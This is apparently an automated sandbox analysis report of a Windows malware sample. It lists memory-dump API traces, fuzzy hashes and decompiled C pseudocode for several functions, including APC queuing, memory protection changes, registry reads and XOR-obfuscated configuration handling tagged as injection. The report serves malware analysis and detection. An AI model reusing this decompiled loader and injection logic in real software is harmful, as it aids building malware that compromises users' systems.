                              0x049d4a13
                              0x049d49bc
                              0x049d49bf
                              0x049d49c6
                              0x049d49cc
                              0x049d49cf
                              0x049d49d1
                              0x049d49dd
                              0x049d49e0
                              0x049d49e0
                              0x049d49e6
                              0x049d49eb
                              0x049d49eb
                              0x049d49f1
                              0x00000000
                              0x049d49f1
                              0x049d48ff
                              0x00000000
                              0x049d4926
                              0x049d4926
                              0x049d4932
                              0x049d4945
                              0x049d494b
                              0x049d4953
                              0x00000000
                              0x049d4953

                              APIs
                              • StrChrA.SHLWAPI(049D6096,0000005F,00000000,00000000,00000104), ref: 049D4918
                              • lstrcpy.KERNEL32(?,?), ref: 049D4945
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                                • Part of subcall function 049D4FA0: lstrlenW.KERNEL32(?,?,?,049D4AAE,3D049DC0,80000002,049D6096,049DA6E1,74666F53,4D4C4B48,049DA6E1,?,3D049DC0,80000002,049D6096,?), ref: 049D4FC5
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • lstrcpy.KERNEL32(?,00000000), ref: 049D4967
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                              • String ID: ($\
                              • API String ID: 3924217599-1512714803
                              • Opcode ID: 74bf0088f52e52c52386c5cb5aaa70be6ef35559aa908e8dd950438a1f5fb1a5
                              • Instruction ID: 3b7aa9e6bfdad8a8d9219bac2b1b7c423d1b2e17266e07be63f40bd9d7f4307b
                              • Opcode Fuzzy Hash: 74bf0088f52e52c52386c5cb5aaa70be6ef35559aa908e8dd950438a1f5fb1a5
                              • Instruction Fuzzy Hash: 5A51273610420AEFEF119FA4DD40EAA7BBAFB48358F10C634FA1596160E735ED65DB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D15C8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37threadCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 053D15E7
                                • Part of subcall function 053D8E6E: RtlEnterCriticalSection.NTDLL(00000000), ref: 053D8E7A
                                • Part of subcall function 053D8E6E: CloseHandle.KERNEL32(?), ref: 053D8E88
                                • Part of subcall function 053D8E6E: RtlLeaveCriticalSection.NTDLL(00000000), ref: 053D8EA4
                              • CloseHandle.KERNEL32(?), ref: 053D15F5
                              • InterlockedDecrement.KERNEL32(053F00BC), ref: 053D1604
                                • Part of subcall function 053E2501: SetEvent.KERNEL32(0000010C,053D161F), ref: 053E250B
                                • Part of subcall function 053E2501: CloseHandle.KERNEL32(0000010C), ref: 053E2520
                                • Part of subcall function 053E2501: HeapDestroy.KERNELBASE(06100000), ref: 053E2530
                              • RtlExitUserThread.NTDLL(00000000), ref: 053D1620
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID: t
                              • API String ID: 1141245775-2238339752
                              • Opcode ID: bc938962c755be76eca07ac2abe1acd4d3d18753ee752a758c3924f7d3b5b2db
                              • Instruction ID: 97d7600230654abf20618ac8a7afe80089a5f2505adcd2ffb15bcbf5f5a330b5
                              • Opcode Fuzzy Hash: bc938962c755be76eca07ac2abe1acd4d3d18753ee752a758c3924f7d3b5b2db
                              • Instruction Fuzzy Hash: ADF0C835650200ABC7165F68DC4EEAEBFBDEB41730F110208FA258B2C0DF795D018BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D3A19, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E049D3A19(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x49dd35c; // 0x58195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x49dd35c; // 0x58195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x49dd030) {
					HeapFree( *0x49dd270, 0, _t8);
				}
				_t9 = E049D311C(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x49dd35c; // 0x58195b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                              0x049d3a19
                              0x049d3a19
                              0x049d3a22
                              0x049d3a32
                              0x049d3a32
                              0x049d3a37
                              0x049d3a3c
                              0x00000000
                              0x00000000
                              0x049d3a2c
                              0x049d3a2c
                              0x049d3a3e
                              0x049d3a42
                              0x049d3a54
                              0x049d3a54
                              0x049d3a5f
                              0x049d3a64
                              0x049d3a67
                              0x049d3a6c
                              0x049d3a70
                              0x049d3a76

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D3A22
                              • Sleep.KERNEL32(0000000A), ref: 049D3A2C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049D3A54
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D3A70
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 3f5a02c7657c005c1bde881033b684c738da145623adabbd48fcab8080c9635a
                              • Instruction ID: 4079eff03c579e9b7107991f5a52af596284483010853a2da999f760dfa250ee
                              • Opcode Fuzzy Hash: 3f5a02c7657c005c1bde881033b684c738da145623adabbd48fcab8080c9635a
                              • Instruction Fuzzy Hash: A3F0FE7430A241EFEB209F69ED48F167FA8EF21349B08C535F901D6290D628EC84CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D587D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 57%
                              			E049D587D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E049D6DCB();
				if(_t21 != 0) {
					_t59 =  *0x49dd294; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x49dd294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x49dd12c(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E049D5203( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x49dd2b8; // 0xe3a5a8
					if( *0x49dd294 > 5) {
						_t8 = _t26 + 0x49de5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x49de9d9; // 0x44283a44
						_t27 = _t7;
					}
					E049D3D42(_t27, _t27);
					_t31 = E049D5C7F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x49dd2a8 =  *0x49dd2a8 ^ 0x81bbe65d;
						_t32 = E049D55DC(0x60);
						__eflags = _t32;
						 *0x49dd35c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x49dd35c; // 0x58195b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x49dd35c; // 0x58195b0
							 *_t51 = 0x49de823;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x49dd270, 0, 0x43);
							__eflags = _t36;
							 *0x49dd300 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x49dd294; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x49dd2b8; // 0xe3a5a8
								_t13 = _t58 + 0x49de55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x49dc2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E049DA303( ~_v8 &  *0x49dd2a8, 0x49dd00c); // executed
								_t42 = E049D294D(0, _t55, _t63, 0x49dd00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E049D2551();
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E049D5038(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E049D8BA7(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x49dd128(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E049D62E1(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                              0x049d587d
                              0x049d5887
                              0x049d588a
                              0x049d588d
                              0x049d5890
                              0x049d5897
                              0x049d5899
                              0x049d58a5
                              0x049d58a7
                              0x049d58a7
                              0x049d58b0
                              0x049d58b8
                              0x049d58bb
                              0x049d58d5
                              0x049d58e1
                              0x049d58e3
                              0x049d58e8
                              0x049d58f2
                              0x049d58f2
                              0x049d58ea
                              0x049d58ea
                              0x049d58ea
                              0x049d58ea
                              0x049d58f9
                              0x049d5906
                              0x049d590d
                              0x049d5912
                              0x049d5912
                              0x049d591b
                              0x049d591e
                              0x049d5944
                              0x049d5950
                              0x049d5955
                              0x049d5957
                              0x049d595c
                              0x049d5988
                              0x049d598a
                              0x049d595e
                              0x049d5962
                              0x049d5967
                              0x049d596c
                              0x049d5973
                              0x049d5979
                              0x049d597e
                              0x049d5984
                              0x049d598b
                              0x049d598d
                              0x049d598f
                              0x049d599e
                              0x049d59a4
                              0x049d59a6
                              0x049d59ab
                              0x049d59db
                              0x049d59dd
                              0x049d59ad
                              0x049d59ad
                              0x049d59b3
                              0x049d59c0
                              0x049d59c6
                              0x049d59c6
                              0x049d59ce
                              0x049d59d7
                              0x049d59de
                              0x049d59e0
                              0x049d59e2
                              0x049d59e9
                              0x049d59f6
                              0x049d59fb
                              0x049d5a00
                              0x049d5a02
                              0x049d5a04
                              0x00000000
                              0x00000000
                              0x049d5a06
                              0x049d5a0b
                              0x049d5a0d
                              0x049d5a14
                              0x049d5a18
                              0x049d5a1b
                              0x049d5a30
                              0x049d5a34
                              0x049d5a39
                              0x00000000
                              0x049d5a39
                              0x049d5a1d
                              0x049d5a1f
                              0x00000000
                              0x00000000
                              0x049d5a2a
                              0x049d5a2c
                              0x049d5a2e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d5a2e
                              0x049d5a11
                              0x049d5a11
                              0x049d59e2
                              0x049d5920
                              0x049d5920
                              0x049d5925
                              0x049d5a3b
                              0x049d5a40
                              0x049d5a48
                              0x049d5a48
                              0x00000000
                              0x049d5a40
                              0x049d592b
                              0x049d592e
                              0x049d5938
                              0x049d593f
                              0x00000000
                              0x049d5a50
                              0x049d5a50
                              0x049d5a53
                              0x049d5a57
                              0x049d5a57

                              APIs
                                • Part of subcall function 049D6DCB: GetModuleHandleA.KERNEL32(4C44544E,00000000,049D5895,00000001), ref: 049D6DDA
                              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 049D5912
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • memset.NTDLL ref: 049D5962
                              • RtlInitializeCriticalSection.NTDLL(05819570), ref: 049D5973
                                • Part of subcall function 049D8BA7: memset.NTDLL ref: 049D8BC1
                                • Part of subcall function 049D8BA7: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 049D8C07
                                • Part of subcall function 049D8BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 049D8C12
                              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 049D599E
                              • wsprintfA.USER32 ref: 049D59CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                              • String ID:
                              • API String ID: 4246211962-0
                              • Opcode ID: 6e7fa1c00e5d3f6b7db978954d9ae718781fddd65f42a697e6730106c441f1d3
                              • Instruction ID: bf80d7eebb5ba7dd160914c1c7df986eab300943d12b1c637392aa593c03b83d
                              • Opcode Fuzzy Hash: 6e7fa1c00e5d3f6b7db978954d9ae718781fddd65f42a697e6730106c441f1d3
                              • Instruction Fuzzy Hash: 8151D471A52225BBFB109FE4DC84A6E7BADEB14728F05C936E101E7140E678F9808B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4B5B, Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D4B5B(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x49dd2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x49dd2b8; // 0xe3a5a8
				_t3 = _t8 + 0x49de876; // 0x61636f4c
				_t25 = 0;
				_t30 = E049D760A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x49dd2e4, 1, 0, _t30);
					E049D6DFA(_t30);
				}
				_t12 =  *0x49dd294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E049D87A1(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E049D3309(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E049D62E1(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}


















                              0x049d4b5c
                              0x049d4b63
                              0x049d4b6d
                              0x049d4b71
                              0x049d4b77
                              0x049d4b86
                              0x049d4b8d
                              0x049d4b91
                              0x049d4ba3
                              0x049d4ba5
                              0x049d4ba5
                              0x049d4baa
                              0x049d4bb1
                              0x049d4c06
                              0x049d4c06
                              0x049d4c0c
                              0x049d4c0e
                              0x049d4c0e
                              0x049d4c13
                              0x049d4c18
                              0x049d4c1c
                              0x049d4c2e
                              0x049d4c2e
                              0x049d4c32
                              0x049d4c38
                              0x049d4c38
                              0x00000000
                              0x049d4bc1
                              0x049d4bc1
                              0x049d4bc8
                              0x00000000
                              0x00000000
                              0x049d4bcf
                              0x049d4bd7
                              0x049d4bd9
                              0x049d4bdd
                              0x049d4bdd
                              0x049d4be5
                              0x049d4bea
                              0x049d4bee
                              0x049d4bf2
                              0x049d4c47
                              0x049d4c4d
                              0x049d4c4d
                              0x049d4c00
                              0x049d4c04
                              0x049d4c3b
                              0x049d4c3d
                              0x049d4c40
                              0x049d4c40
                              0x00000000
                              0x049d4c3d
                              0x049d4c04
                              0x00000000
                              0x049d4bee

                              APIs
                                • Part of subcall function 049D760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05819B78,00000000,?,?,69B25F44,00000005,049DD00C,4D283A53,?,?), ref: 049D7640
                                • Part of subcall function 049D760A: lstrcpy.KERNEL32(00000000,00000000), ref: 049D7664
                                • Part of subcall function 049D760A: lstrcat.KERNEL32(00000000,00000000), ref: 049D766C
                              • CreateEventA.KERNEL32(049DD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4B9C
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • StrChrW.SHLWAPI(049D60B5,00000020,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4BCF
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,049D60B5,00000000,00000000,?,00000000,?,049D60B5,?,?,?), ref: 049D4BFA
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4C28
                              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,049D60B5,?,?,?), ref: 049D4C40
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 73268831-0
                              • Opcode ID: 830ed637fd74ad55f97e49c38dbed27f82ec8e2d39b9a67439aa6287e8f3b084
                              • Instruction ID: d8db8433f8345b549ddc116afe720b7d0296b1448e200f992d91af5e7fb05fbc
                              • Opcode Fuzzy Hash: 830ed637fd74ad55f97e49c38dbed27f82ec8e2d39b9a67439aa6287e8f3b084
                              • Instruction Fuzzy Hash: 712147726013116BE7319FB89D89AAB779DEF88711B098334FE46EB100EB78FC418654
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E32FF, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D64DE: RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                                • Part of subcall function 053D64DE: lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E3381
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: aa82bd2b449318c49d45c3709fa3ce1459036b8e62d640b7c1838e73ac795672
                              • Instruction ID: f7218f4230d4f6c1389c914fc58019cde4f15696410e7bff38cb28ae64b4a188
                              • Opcode Fuzzy Hash: aa82bd2b449318c49d45c3709fa3ce1459036b8e62d640b7c1838e73ac795672
                              • Instruction Fuzzy Hash: EC114CB6510119FFDB119F98DC89CAEBFBEFB88354B11042AF5019B190DB71AD50DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D2EBD, Relevance: 7.5, APIs: 5, Instructions: 49threadinjectionCOMMON
                              Download Yara Rule
                              C-Code - Quality: 49%
                              			E049D2EBD(void* __ecx, void* __edi, intOrPtr _a4) {
				unsigned int _v8;
				void* _v12;
				long _t15;
				long _t16;
				signed int _t18;
				signed int _t19;
				unsigned int _t21;
				unsigned int _t26;

				asm("stosd");
				_v12 = _v12 | 0xffffffff;
				while(1) {
					_t15 = QueueUserAPC(E049D293E, GetCurrentThread(),  &_v12); // executed
					if(_t15 == 0) {
						break;
					}
					_t26 = _v8;
					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
					_push(0);
					_push(0x13);
					_push(_t26 >> 5);
					_push(_t18);
					L049DB18E();
					_push(1);
					_t19 = 3;
					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
					_t16 = E049D54DF(_a4, (_t21 >> 6) + _t18);
					if(_t16 == 1) {
						continue;
					} else {
					}
					L5:
					return _t16;
				}
				_t16 = GetLastError();
				goto L5;
			}











                              0x049d2ec8
                              0x049d2ec9
                              0x049d2ecf
                              0x049d2edf
                              0x049d2ee7
                              0x00000000
                              0x00000000
                              0x049d2eec
                              0x049d2eef
                              0x049d2ef3
                              0x049d2ef5
                              0x049d2efa
                              0x049d2efb
                              0x049d2efc
                              0x049d2f03
                              0x049d2f09
                              0x049d2f10
                              0x049d2f1f
                              0x049d2f27
                              0x00000000
                              0x00000000
                              0x049d2f29
                              0x049d2f31
                              0x049d2f33
                              0x049d2f33
                              0x049d2f2b
                              0x00000000

                              APIs
                              • GetCurrentThread.KERNEL32 ref: 049D2ED3
                              • QueueUserAPC.KERNEL32(049D293E,00000000,?,?,?,049D2348,?,?), ref: 049D2EDF
                              • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 049D2EFC
                              • SleepEx.KERNEL32(00000003,00000001,?,?,?,049D2348,?,?), ref: 049D2F10
                                • Part of subcall function 049D54DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 049D553E
                              • GetLastError.KERNEL32(?,?,?,049D2348,?,?), ref: 049D2F2B
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                              • String ID:
                              • API String ID: 2952296216-0
                              • Opcode ID: c0c6c01eeb5b43a236d6767109d6339b6f020188d4fe0794eeb05f43ad726b6a
                              • Instruction ID: 2803912ed4d985995c5c9bc22914ccaa6b3730e5b5c7cf46ac42ffe809ba8864
                              • Opcode Fuzzy Hash: c0c6c01eeb5b43a236d6767109d6339b6f020188d4fe0794eeb05f43ad726b6a
                              • Instruction Fuzzy Hash: FF018BB2650104BBEB145BE4DC5EFAEBB6CEB45750F104575F602D6180E5B4EA40C761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E4E7E, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(?,?,00000040,00000000,011075A8,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EA3
                              • GetLastError.KERNEL32(?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EAB
                              • VirtualQuery.KERNEL32(?,011075A8,0000001C,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EC2
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EE7
                              • SetLastError.KERNEL32(?,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EF0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: 5dcd7b633f91855536026f077d82da8a9bf00142105edf9a7a2b390777991119
                              • Instruction ID: 723c67aa7c328af9afa9105a879b06b9c7dcbe6463a25214344c383758d047f2
                              • Opcode Fuzzy Hash: 5dcd7b633f91855536026f077d82da8a9bf00142105edf9a7a2b390777991119
                              • Instruction Fuzzy Hash: DE011776500219EF9F219F95CC48CAABBBDFB4C250B014426F901EB160DBB1A914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4C56, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D4C56(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E049D5EF5(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x49dd2b8; // 0xe3a5a8
				_t4 = _t24 + 0x49dee10; // 0x58193b8
				_t5 = _t24 + 0x49dedb8; // 0x4f0053
				_t26 = E049DA415( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x49dd2b8; // 0xe3a5a8
						_t11 = _t32 + 0x49dee04; // 0x58193ac
						_t48 = _t11;
						_t12 = _t32 + 0x49dedb8; // 0x4f0053
						_t52 = E049D5434(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x49dd2b8; // 0xe3a5a8
							_t13 = _t35 + 0x49dee4e; // 0x30314549
							if(E049D3A79(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x49dd294 - 6;
								if( *0x49dd294 <= 6) {
									_t42 =  *0x49dd2b8; // 0xe3a5a8
									_t15 = _t42 + 0x49ded9a; // 0x52384549
									E049D3A79(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x49dd2b8; // 0xe3a5a8
							_t17 = _t38 + 0x49dee48; // 0x58193f0
							_t18 = _t38 + 0x49dee20; // 0x680043
							_t40 = E049D4FA0(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x49dd270, 0, _t52);
						}
					}
					HeapFree( *0x49dd270, 0, _v16);
				}
				_t54 = _v8;
